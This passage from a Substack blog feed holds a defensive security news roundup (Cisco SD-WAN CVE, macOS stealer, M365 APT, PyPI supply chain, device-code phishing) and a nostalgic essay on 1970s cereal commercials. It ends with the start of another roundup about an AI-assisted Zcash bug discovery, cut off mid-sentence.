url="https://substackcdn.com/image/fetch/$s_!sd0V!,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fdfd8c6cc-10e1-4a59-80ac-de62d6cae29f_1168x784.jpeg" length="0" type="image/jpeg"/><content:encoded><![CDATA[<div class="captioned-image-container"><figure><a class="image-link image2 is-viewable-img" target="_blank" href="https://substackcdn.com/image/fetch/$s_!sd0V!,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fdfd8c6cc-10e1-4a59-80ac-de62d6cae29f_1168x784.jpeg" data-component-name="Image2ToDOM"><div class="image2-inset"><picture><source type="image/webp" srcset="https://substackcdn.com/image/fetch/$s_!sd0V!,w_424,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fdfd8c6cc-10e1-4a59-80ac-de62d6cae29f_1168x784.jpeg 424w, https://substackcdn.com/image/fetch/$s_!sd0V!,w_848,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fdfd8c6cc-10e1-4a59-80ac-de62d6cae29f_1168x784.jpeg 848w, https://substackcdn.com/image/fetch/$s_!sd0V!,w_1272,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fdfd8c6cc-10e1-4a59-80ac-de62d6cae29f_1168x784.jpeg 1272w, https://substackcdn.com/image/fetch/$s_!sd0V!,w_1456,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fdfd8c6cc-10e1-4a59-80ac-de62d6cae29f_1168x784.jpeg 1456w" sizes="100vw"><img src="https://substackcdn.com/image/fetch/$s_!sd0V!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fdfd8c6cc-10e1-4a59-80ac-de62d6cae29f_1168x784.jpeg" width="1168" height="784" data-attrs="{&quot;src&quot;:&quot;https://substack-post-media.s3.amazonaws.com/public/images/dfd8c6cc-10e1-4a59-80ac-de62d6cae29f_1168x784.jpeg&quot;,&quot;srcNoWatermark&quot;:null,&quot;fullscreen&quot;:null,&quot;imageSize&quot;:null,&quot;height&quot;:784,&quot;width&quot;:1168,&quot;resizeWidth&quot;:null,&quot;bytes&quot;:306090,&quot;alt&quot;:null,&quot;title&quot;:null,&quot;type&quot;:&quot;image/jpeg&quot;,&quot;href&quot;:null,&quot;belowTheFold&quot;:false,&quot;topImage&quot;:true,&quot;internalRedirect&quot;:&quot;https://rodtrent.substack.com/i/200993861?img=https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fdfd8c6cc-10e1-4a59-80ac-de62d6cae29f_1168x784.jpeg&quot;,&quot;isProcessing&quot;:false,&quot;align&quot;:null,&quot;offset&quot;:false}" class="sizing-normal" alt="" srcset="https://substackcdn.com/image/fetch/$s_!sd0V!,w_424,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fdfd8c6cc-10e1-4a59-80ac-de62d6cae29f_1168x784.jpeg 424w, https://substackcdn.com/image/fetch/$s_!sd0V!,w_848,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fdfd8c6cc-10e1-4a59-80ac-de62d6cae29f_1168x784.jpeg 848w, https://substackcdn.com/image/fetch/$s_!sd0V!,w_1272,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fdfd8c6cc-10e1-4a59-80ac-de62d6cae29f_1168x784.jpeg 1272w, https://substackcdn.com/image/fetch/$s_!sd0V!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fdfd8c6cc-10e1-4a59-80ac-de62d6cae29f_1168x784.jpeg 1456w" sizes="100vw" fetchpriority="high"></picture><div class="image-link-expand"><div class="pencraft pc-display-flex pc-gap-8 pc-reset"><button tabindex="0" type="button" class="pencraft pc-reset pencraft icon-container restack-image"><svg role="img" width="20" height="20" viewBox="0 0 20 20" fill="none" stroke-width="1.5" stroke="var(--color-fg-primary)" stroke-linecap="round" stroke-linejoin="round" xmlns="http://www.w3.org/2000/svg"><g><title></title><path d="M2.53001 7.81595C3.49179 4.73911 6.43281 2.5 9.91173 2.5C13.1684 2.5 15.9537 4.46214 17.0852 7.23684L17.6179 8.67647M17.6179 8.67647L18.5002 4.26471M17.6179 8.67647L13.6473 6.91176M17.4995 12.1841C16.5378 15.2609 13.5967 17.5 10.1178 17.5C6.86118 17.5 4.07589 15.5379 2.94432 12.7632L2.41165 11.3235M2.41165 11.3235L1.5293 15.7353M2.41165 11.3235L6.38224 13.0882"></path></g></svg></button><button tabindex="0" type="button" class="pencraft pc-reset pencraft icon-container view-image"><svg xmlns="http://www.w3.org/2000/svg" width="20" height="20" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round" class="lucide lucide-maximize2 lucide-maximize-2"><polyline points="15 3 21 3 21 9"></polyline><polyline points="9 21 3 21 3 15"></polyline><line x1="21" x2="14" y1="3" y2="10"></line><line x1="3" x2="10" y1="21" y2="14"></line></svg></button></div></div></div></a></figure></div><h3>Active Exploitation of Cisco SD-WAN Vulnerability (CVE-2026-20245)</h3><p>Cisco has disclosed a critical vulnerability in its Catalyst SD-WAN Manager that is already being actively exploited in the wild. The flaw (CVE-2026-20245) allows authenticated users with netadmin privileges to upload crafted files and execute arbitrary commands as root.</p><p><strong>Key Details:</strong></p><div class="subscription-widget-wrap-editor" data-attrs="{&quot;url&quot;:&quot;https://rodtrent.substack.com/subscribe?&quot;,&quot;text&quot;:&quot;Subscribe&quot;,&quot;language&quot;:&quot;en&quot;}" data-component-name="SubscribeWidgetToDOM"><div class="subscription-widget show-subscribe"><div class="preamble"><p class="cta-caption">Rod&#8217;s Blog is a reader-supported publication. To receive new posts and support my work, consider becoming a free or paid subscriber.</p></div><form class="subscription-widget-subscribe"><input type="email" class="email-input" name="email" placeholder="Type your email&#8230;" tabindex="-1"><input type="submit" class="button primary" value="Subscribe"><div class="fake-input-wrapper"><div class="fake-input"></div><div class="fake-button"></div></div></form></div></div><ul><li><p>No patches or official mitigations are currently available.</p></li><li><p>Indicators of compromise (IoCs) can be checked in /var/log/scripts.log.</p></li><li><p>Organizations using Cisco SD-WAN should immediately review access controls, monitor for suspicious activity, and consider temporary workarounds like restricting file upload capabilities where possible.</p></li></ul><p>This serves as a stark reminder that even established networking vendors remain prime targets, especially for flaws that grant root-level access. Defenders should prioritize logging and anomaly detection in SD-WAN environments.</p><h3>New &#8216;Reaper&#8217; Variant of SHub Stealer Targets macOS Users</h3><p>A sophisticated new variant of the SHub Stealer malware, dubbed &#8220;Reaper,&#8221; is automating infections on Mac systems. It focuses on compromising browsers, stealing credentials, and targeting cryptocurrency wallets.</p><p><strong>Impact and Tactics:</strong></p><ul><li><p>Automates infection chains for faster compromise.</p></li><li><p>Exfiltrates sensitive data including browser-stored credentials and wallet information.</p></li><li><p>Represents an evolution in infostealer threats shifting toward the macOS ecosystem, which has historically seen fewer such attacks.</p></li></ul><p>Mac users and organizations with BYOD policies should ensure updated security software, avoid suspicious downloads, and monitor for unusual browser or wallet activity. This highlights the expanding attack surface beyond traditional Windows targets.</p><h3>Chinese APT UNC5221 Deploys New Malware Against Microsoft 365</h3><p>The Chinese-linked advanced persistent threat group UNC5221 is using novel malware to maintain persistent access within Microsoft 365 environments. This includes techniques to evade detection and persist through sign-ins.</p><p><strong>Recommendations:</strong></p><ul><li><p>Review Microsoft 365 sign-in logs thoroughly.</p></li><li><p>Enforce strong MFA and privileged access management.</p></li><li><p>Monitor for anomalous behavior in cloud environments.</p></li></ul><p>This campaign underscores the ongoing nation-state focus on cloud identity and collaboration platforms. Organizations should treat M365 as a high-value target requiring layered defenses beyond basic controls.</p><h3>PyPI Supply Chain Attack: Hades Cluster Steals Cloud Credentials</h3><p>A significant supply chain attack on PyPI (Python Package Index) has been uncovered, involving the &#8220;Hades&#8221; cluster of malicious packages. Attackers are leveraging it to steal cloud credentials from developers.</p><p><strong>What Happened:</strong></p><ul><li><p>Malicious packages were published and detected via advanced malware tools like Socket.</p></li><li><p>Targets developers&#8217; environments to harvest credentials for broader cloud compromises.</p></li></ul><p>Developers and organizations using Python ecosystems should scan dependencies, use virtual environments, and adopt tools for supply chain security. This incident reinforces the risks in open-source repositories and the need for vigilant package vetting.</p><h3>Rising Device-Code Phishing Campaigns</h3><p>Security researchers have identified clusters of phishing sites abusing OAuth device code flows, often impersonating vendor contracts or voicemail systems. Domains follow patterns like &lt;alphanumeric&gt;.billbutterworth.com and similar, linked to credential theft.</p><p><strong>Defense Tips:</strong></p><ul><li><p>Educate users on verifying device authorization requests.</p></li><li><p>Monitor for unusual OAuth activity.</p></li><li><p>Share IOCs across defender communities.</p></li></ul><p>These campaigns show attackers&#8217; creativity in abusing legitimate authentication mechanisms for initial access.</p><p><strong>Overall Takeaways for Today:</strong><br>Cyber threats continue to target critical infrastructure (Cisco), expanding platforms (macOS), cloud identities (M365), developer supply chains (PyPI), and authentication flows. Stay vigilant with patching (where possible), monitoring, MFA, and supply chain hygiene.</p><p><em>Stay secure out there &#8212; regular check-ins like this help keep the pulse on evolving risks.</em></p><div class="subscription-widget-wrap-editor" data-attrs="{&quot;url&quot;:&quot;https://rodtrent.substack.com/subscribe?&quot;,&quot;text&quot;:&quot;Subscribe&quot;,&quot;language&quot;:&quot;en&quot;}" data-component-name="SubscribeWidgetToDOM"><div class="subscription-widget show-subscribe"><div class="preamble"><p class="cta-caption">Rod&#8217;s Blog is a reader-supported publication. To receive new posts and support my work, consider becoming a free or paid subscriber.</p></div><form class="subscription-widget-subscribe"><input type="email" class="email-input" name="email" placeholder="Type your email&#8230;" tabindex="-1"><input type="submit" class="button primary" value="Subscribe"><div class="fake-input-wrapper"><div class="fake-input"></div><div class="fake-button"></div></div></form></div></div>]]></content:encoded></item><item><title><![CDATA[The Rise and Fall of Saturday Morning Cereal Commercials]]></title><description><![CDATA[How ads for sugary cereals were half the fun of cartoons, and what algorithmic kids&#8217; content lost in the process.]]></description><link>https://rodtrent.substack.com/p/the-rise-and-fall-of-saturday-morning</link><guid isPermaLink="false">https://rodtrent.substack.com/p/the-rise-and-fall-of-saturday-morning</guid><dc:creator><![CDATA[Rod Trent]]></dc:creator><pubDate>Sun, 07 Jun 2026 16:00:49 GMT</pubDate><enclosure url="https://substackcdn.com/image/fetch/$s_!ZtUO!,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F71ce3c30-8871-4003-ba1a-8791828b8ae8_1168x784.jpeg" length="0" type="image/jpeg"/><content:encoded><![CDATA[<div class="captioned-image-container"><figure><a class="image-link image2 is-viewable-img" target="_blank" href="https://substackcdn.com/image/fetch/$s_!ZtUO!,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F71ce3c30-8871-4003-ba1a-8791828b8ae8_1168x784.jpeg" data-component-name="Image2ToDOM"><div class="image2-inset"><picture><source type="image/webp" srcset="https://substackcdn.com/image/fetch/$s_!ZtUO!,w_424,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F71ce3c30-8871-4003-ba1a-8791828b8ae8_1168x784.jpeg 424w, https://substackcdn.com/image/fetch/$s_!ZtUO!,w_848,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F71ce3c30-8871-4003-ba1a-8791828b8ae8_1168x784.jpeg 848w, https://substackcdn.com/image/fetch/$s_!ZtUO!,w_1272,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F71ce3c30-8871-4003-ba1a-8791828b8ae8_1168x784.jpeg 1272w, https://substackcdn.com/image/fetch/$s_!ZtUO!,w_1456,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F71ce3c30-8871-4003-ba1a-8791828b8ae8_1168x784.jpeg 1456w" sizes="100vw"><img src="https://substackcdn.com/image/fetch/$s_!ZtUO!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F71ce3c30-8871-4003-ba1a-8791828b8ae8_1168x784.jpeg" width="1168" height="784" data-attrs="{&quot;src&quot;:&quot;https://substack-post-media.s3.amazonaws.com/public/images/71ce3c30-8871-4003-ba1a-8791828b8ae8_1168x784.jpeg&quot;,&quot;srcNoWatermark&quot;:null,&quot;fullscreen&quot;:null,&quot;imageSize&quot;:null,&quot;height&quot;:784,&quot;width&quot;:1168,&quot;resizeWidth&quot;:null,&quot;bytes&quot;:347498,&quot;alt&quot;:null,&quot;title&quot;:null,&quot;type&quot;:&quot;image/jpeg&quot;,&quot;href&quot;:null,&quot;belowTheFold&quot;:false,&quot;topImage&quot;:true,&quot;internalRedirect&quot;:&quot;https://rodtrent.substack.com/i/196158017?img=https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F71ce3c30-8871-4003-ba1a-8791828b8ae8_1168x784.jpeg&quot;,&quot;isProcessing&quot;:false,&quot;align&quot;:null,&quot;offset&quot;:false}" class="sizing-normal" alt="" srcset="https://substackcdn.com/image/fetch/$s_!ZtUO!,w_424,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F71ce3c30-8871-4003-ba1a-8791828b8ae8_1168x784.jpeg 424w, https://substackcdn.com/image/fetch/$s_!ZtUO!,w_848,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F71ce3c30-8871-4003-ba1a-8791828b8ae8_1168x784.jpeg 848w, https://substackcdn.com/image/fetch/$s_!ZtUO!,w_1272,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F71ce3c30-8871-4003-ba1a-8791828b8ae8_1168x784.jpeg 1272w, https://substackcdn.com/image/fetch/$s_!ZtUO!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F71ce3c30-8871-4003-ba1a-8791828b8ae8_1168x784.jpeg 1456w" sizes="100vw" fetchpriority="high"></picture><div class="image-link-expand"><div class="pencraft pc-display-flex pc-gap-8 pc-reset"><button tabindex="0" type="button" class="pencraft pc-reset pencraft icon-container restack-image"><svg role="img" width="20" height="20" viewBox="0 0 20 20" fill="none" stroke-width="1.5" stroke="var(--color-fg-primary)" stroke-linecap="round" stroke-linejoin="round" xmlns="http://www.w3.org/2000/svg"><g><title></title><path d="M2.53001 7.81595C3.49179 4.73911 6.43281 2.5 9.91173 2.5C13.1684 2.5 15.9537 4.46214 17.0852 7.23684L17.6179 8.67647M17.6179 8.67647L18.5002 4.26471M17.6179 8.67647L13.6473 6.91176M17.4995 12.1841C16.5378 15.2609 13.5967 17.5 10.1178 17.5C6.86118 17.5 4.07589 15.5379 2.94432 12.7632L2.41165 11.3235M2.41165 11.3235L1.5293 15.7353M2.41165 11.3235L6.38224 13.0882"></path></g></svg></button><button tabindex="0" type="button" class="pencraft pc-reset pencraft icon-container view-image"><svg xmlns="http://www.w3.org/2000/svg" width="20" height="20" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round" class="lucide lucide-maximize2 lucide-maximize-2"><polyline points="15 3 21 3 21 9"></polyline><polyline points="9 21 3 21 3 15"></polyline><line x1="21" x2="14" y1="3" y2="10"></line><line x1="3" x2="10" y1="21" y2="14"></line></svg></button></div></div></div></a></figure></div><p>It&#8217;s Saturday morning, 1977. You&#8217;re a kid in anywhere USA. The alarm clock isn&#8217;t needed&#8212;you wake up with the first light, slip into your footie pajamas or that worn-out t-shirt, and pad downstairs. Mom or Dad might still be sleeping, so you pour your own bowl: maybe Frosted Flakes with Tony the Tiger grinning from the box, or Lucky Charms with those colorful marshmallows, or Cap&#8217;n Crunch that cuts the roof of your mouth just right. Milk splashes. Spoon clinks. You plop down cross-legged on the shag carpet in front of the big wooden console TV, turn the knob (click-click-click), and wait for the test pattern to fade into the magic.</p><p>No remote. No streaming. Just you, the static hum, and the promise of two or three glorious hours of cartoons&#8212;<em>Scooby-Doo</em>, <em>Super Friends</em>, <em>The Bugs Bunny/Road Runner Hour</em>, maybe <em>Josie and the Pussycats</em> or reruns of <em>The Flintstones</em>. But here&#8217;s the secret: half the fun wasn&#8217;t even the cartoons. It was the commercials. Those bright, jingly, larger-than-life cereal ads that burst onto the screen like old friends. They weren&#8217;t interruptions. They were the heartbeat of the morning.</p><div class="subscription-widget-wrap-editor" data-attrs="{&quot;url&quot;:&quot;https://rodtrent.substack.com/subscribe?&quot;,&quot;text&quot;:&quot;Subscribe&quot;,&quot;language&quot;:&quot;en&quot;}" data-component-name="SubscribeWidgetToDOM"><div class="subscription-widget show-subscribe"><div class="preamble"><p class="cta-caption">Rod&#8217;s Blog is a reader-supported publication. To receive new posts and support my work, consider becoming a free or paid subscriber.</p></div><form class="subscription-widget-subscribe"><input type="email" class="email-input" name="email" placeholder="Type your email&#8230;" tabindex="-1"><input type="submit" class="button primary" value="Subscribe"><div class="fake-input-wrapper"><div class="fake-input"></div><div class="fake-button"></div></div></form></div></div><h3>1977: The Peak of the Saturday Morning Ritual</h3><p>By the mid-1970s, Saturday morning had become sacred kids&#8217; territory on the big three networks. Cereal giants like Kellogg&#8217;s, General Mills, and Post had the formula down: fun animated mascots, catchy jingles, and pure kid appeal. Tony the Tiger had been &#8220;gr-r-r-eat!&#8221; since the 1950s. The Trix Rabbit was still trying (and failing) to get his fruity cereal. Sonny the Cuckoo Bird went cuckoo for Cocoa Puffs. Cap&#8217;n Crunch sailed the seas with his crew. These spots were mini-cartoons themselves&#8212;colorful, energetic, and impossible to ignore.</p><p>You&#8217;d see them right in the flow: after Scooby and the gang unmasked the villain, or between Road Runner outsmarting Wile E. Coyote again. The ads promised adventure in every bowl, prizes in the box (those little plastic toys or comics), and a sugar rush that matched the on-screen excitement. No one worried much about nutrition labels yet. It was the golden age of the &#8220;part of a complete breakfast&#8221; line, delivered with a wink.</p><p>The whole experience was pure ritual. No one had a dozen channels or on-demand libraries. You got what the network gave you, and everyone in your neighborhood was watching the same thing. Monday at school you&#8217;d trade stories: &#8220;Did you see that new Trix ad?&#8221; or &#8220;I&#8217;m gonna ask for the cereal with the prize!&#8221; The commercials built community as much as the shows did. They taught you jingles that still pop into your head decades later. They made waiting for the next cartoon block exciting instead of boring.</p><h3>Why the Cereal Ads Were Half the Fun</h3><p>Those 30-second spots were <em>events</em>. You didn&#8217;t mute them or leave the room. You leaned in. The animation style often matched the cartoons&#8212;bold colors, slapstick humor, heroic mascots. They gave you a natural break to crunch another spoonful or run for more milk. They sparked imagination: suddenly your bowl wasn&#8217;t just breakfast; it was fuel for pretending you were chasing the Trix Rabbit or high-fiving Tony.</p><p>In 1977, it felt innocent and shared. No algorithms deciding what you saw based on yesterday&#8217;s views. Just national broadcasts beaming the same joy (and the same sugar pitch) into living rooms across America. It was consumerism wrapped in cartoon wonder, and for a kid on the floor with a soggy bowl, it was perfect.</p><h3>The Slow Decline&#8212;and the Rise of Something Else</h3><p>The cracks started showing later. Health concerns grew. Regulations like the Children&#8217;s Television Act in 1990 limited ad time and pushed for more educational content. Cable brought 24/7 cartoons. Then DVRs, streaming, and YouTube Kids changed everything. No more waiting for Saturday. No more fixed schedule. Kids today pick up a tablet anytime and dive into personalized autoplay.</p><p>What got lost? The magic of the ritual. The communal &#8220;everyone&#8217;s watching this&#8221; feeling. The delightful anticipation of those specific cereal spots woven into the morning. Modern algorithmic content is efficient and endless, but it lacks the heartbeat of a shared Saturday&#8212;those built-in breaks, the serendipity of a great ad, the simple joy of a bowl of cereal and a console TV glowing in a quiet house.</p><p>The 1977 version wasn&#8217;t perfect (those sugar crashes were real), but it was <em>alive</em> with shared wonder. Tony still roars in memory. Those mornings on the carpet, spoon in hand, cartoons and commercials blending into one perfect haze&#8212;they were gr-r-r-eat. And we&#8217;ll never quite get them back.</p><div class="subscription-widget-wrap-editor" data-attrs="{&quot;url&quot;:&quot;https://rodtrent.substack.com/subscribe?&quot;,&quot;text&quot;:&quot;Subscribe&quot;,&quot;language&quot;:&quot;en&quot;}" data-component-name="SubscribeWidgetToDOM"><div class="subscription-widget show-subscribe"><div class="preamble"><p class="cta-caption">Rod&#8217;s Blog is a reader-supported publication. To receive new posts and support my work, consider becoming a free or paid subscriber.</p></div><form class="subscription-widget-subscribe"><input type="email" class="email-input" name="email" placeholder="Type your email&#8230;" tabindex="-1"><input type="submit" class="button primary" value="Subscribe"><div class="fake-input-wrapper"><div class="fake-input"></div><div class="fake-button"></div></div></form></div></div>]]></content:encoded></item><item><title><![CDATA[Security Check-in Quick Hits: Zcash AI-Discovered Crypto Flaw, Instagram AI Chatbot Hijacks, and Rising Supply Chain Threats]]></title><description><![CDATA[For June 6, 2026]]></description><link>https://rodtrent.substack.com/p/security-check-in-quick-hits-zcash-394</link><guid isPermaLink="false">https://rodtrent.substack.com/p/security-check-in-quick-hits-zcash-394</guid><dc:creator><![CDATA[Rod Trent]]></dc:creator><pubDate>Sat, 06 Jun 2026 18:01:18 GMT</pubDate><enclosure url="https://substackcdn.com/image/fetch/$s_!luY9!,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F12148cd5-79ee-4b94-a650-bd5910580b76_1248x832.jpeg" length="0" type="image/jpeg"/><content:encoded><![CDATA[<div class="captioned-image-container"><figure><a class="image-link image2 is-viewable-img" target="_blank" href="https://substackcdn.com/image/fetch/$s_!luY9!,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F12148cd5-79ee-4b94-a650-bd5910580b76_1248x832.jpeg" data-component-name="Image2ToDOM"><div class="image2-inset"><picture><source type="image/webp" srcset="https://substackcdn.com/image/fetch/$s_!luY9!,w_424,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F12148cd5-79ee-4b94-a650-bd5910580b76_1248x832.jpeg 424w, https://substackcdn.com/image/fetch/$s_!luY9!,w_848,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F12148cd5-79ee-4b94-a650-bd5910580b76_1248x832.jpeg 848w, https://substackcdn.com/image/fetch/$s_!luY9!,w_1272,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F12148cd5-79ee-4b94-a650-bd5910580b76_1248x832.jpeg 1272w, https://substackcdn.com/image/fetch/$s_!luY9!,w_1456,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F12148cd5-79ee-4b94-a650-bd5910580b76_1248x832.jpeg 1456w" sizes="100vw"><img src="https://substackcdn.com/image/fetch/$s_!luY9!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F12148cd5-79ee-4b94-a650-bd5910580b76_1248x832.jpeg" width="1248" height="832" data-attrs="{&quot;src&quot;:&quot;https://substack-post-media.s3.amazonaws.com/public/images/12148cd5-79ee-4b94-a650-bd5910580b76_1248x832.jpeg&quot;,&quot;srcNoWatermark&quot;:null,&quot;fullscreen&quot;:null,&quot;imageSize&quot;:null,&quot;height&quot;:832,&quot;width&quot;:1248,&quot;resizeWidth&quot;:null,&quot;bytes&quot;:308644,&quot;alt&quot;:null,&quot;title&quot;:null,&quot;type&quot;:&quot;image/jpeg&quot;,&quot;href&quot;:null,&quot;belowTheFold&quot;:false,&quot;topImage&quot;:true,&quot;internalRedirect&quot;:&quot;https://rodtrent.substack.com/i/200879914?img=https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F12148cd5-79ee-4b94-a650-bd5910580b76_1248x832.jpeg&quot;,&quot;isProcessing&quot;:false,&quot;align&quot;:null,&quot;offset&quot;:false}" class="sizing-normal" alt="" srcset="https://substackcdn.com/image/fetch/$s_!luY9!,w_424,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F12148cd5-79ee-4b94-a650-bd5910580b76_1248x832.jpeg 424w, https://substackcdn.com/image/fetch/$s_!luY9!,w_848,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F12148cd5-79ee-4b94-a650-bd5910580b76_1248x832.jpeg 848w, https://substackcdn.com/image/fetch/$s_!luY9!,w_1272,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F12148cd5-79ee-4b94-a650-bd5910580b76_1248x832.jpeg 1272w, https://substackcdn.com/image/fetch/$s_!luY9!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F12148cd5-79ee-4b94-a650-bd5910580b76_1248x832.jpeg 1456w" sizes="100vw" fetchpriority="high"></picture><div class="image-link-expand"><div class="pencraft pc-display-flex pc-gap-8 pc-reset"><button tabindex="0" type="button" class="pencraft pc-reset pencraft icon-container restack-image"><svg role="img" width="20" height="20" viewBox="0 0 20 20" fill="none" stroke-width="1.5" stroke="var(--color-fg-primary)" stroke-linecap="round" stroke-linejoin="round" xmlns="http://www.w3.org/2000/svg"><g><title></title><path d="M2.53001 7.81595C3.49179 4.73911 6.43281 2.5 9.91173 2.5C13.1684 2.5 15.9537 4.46214 17.0852 7.23684L17.6179 8.67647M17.6179 8.67647L18.5002 4.26471M17.6179 8.67647L13.6473 6.91176M17.4995 12.1841C16.5378 15.2609 13.5967 17.5 10.1178 17.5C6.86118 17.5 4.07589 15.5379 2.94432 12.7632L2.41165 11.3235M2.41165 11.3235L1.5293 15.7353M2.41165 11.3235L6.38224 13.0882"></path></g></svg></button><button tabindex="0" type="button" class="pencraft pc-reset pencraft icon-container view-image"><svg xmlns="http://www.w3.org/2000/svg" width="20" height="20" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round" class="lucide lucide-maximize2 lucide-maximize-2"><polyline points="15 3 21 3 21 9"></polyline><polyline points="9 21 3 21 3 15"></polyline><line x1="21" x2="14" y1="3" y2="10"></line><line x1="3" x2="10" y1="21" y2="14"></line></svg></button></div></div></div></a></figure></div><h3>Zcash&#8217;s Critical Orchard Vulnerability: AI Uncovers 4-Year-Old Counterfeiting Bug, Triggers Massive Price Crash</h3><p>A major story dominating cybersecurity and crypto discussions this week is the disclosure of a severe soundness bug in Zcash&#8217;s ($ZEC) Orchard shielded pool. The vulnerability, present since around 2022, could have theoretically allowed attackers to mint an unlimited number of counterfeit ZEC tokens undetected, potentially undermining the entire supply integrity of the privacy-focused cryptocurrency.</p><p>Security researcher Taylor Hornby, engaged by the Zcash team (via Shielded Labs/ZODL), discovered the flaw on May 29, 2026, with significant assistance from Anthropic&#8217;s Claude Opus 4.8 AI model during a targeted audit of the zero-knowledge proof circuits. The project responded swiftly with an emergency soft fork on June 1 and a hard fork (NU6.2) on June 3. No exploitation was confirmed, and the 21 million token cap remained intact.</p><div class="subscription-widget-wrap-editor" data-attrs="{&quot;url&quot;:&quot;https://rodtrent.substack.com/subscribe?&quot;,&quot;text&quot;:&quot;Subscribe&quot;,&quot;language&quot;:&quot;en&quot;}" data-component-name="SubscribeWidgetToDOM"><div class="subscription-widget show-subscribe"><div class="preamble"><p class="cta-caption">Rod&#8217;s Blog is a reader-supported publication. To receive new posts and support my work, consider becoming a free or paid subscriber.</p></div><form class="subscription-widget-subscribe"><input type="email" class="email-input" name="email" placeholder="Type your email&#8230;" tabindex="-1"><input type="submit" class="button primary" value="Subscribe"><div class="fake-input-wrapper"><div class="fake-input"></div><div class="fake-button"></div></div></form></div></div><p><strong>Market Impact</strong>: ZEC plummeted up to 48% (from highs around $624 to lows near $309), wiping out billions in market value amid broader sell-off pressures, before partially recovering. The incident underscores the dual role of AI in cybersecurity&#8212;accelerating both discovery of hidden flaws and potential attack sophistication&#8212;while highlighting ongoing challenges for privacy 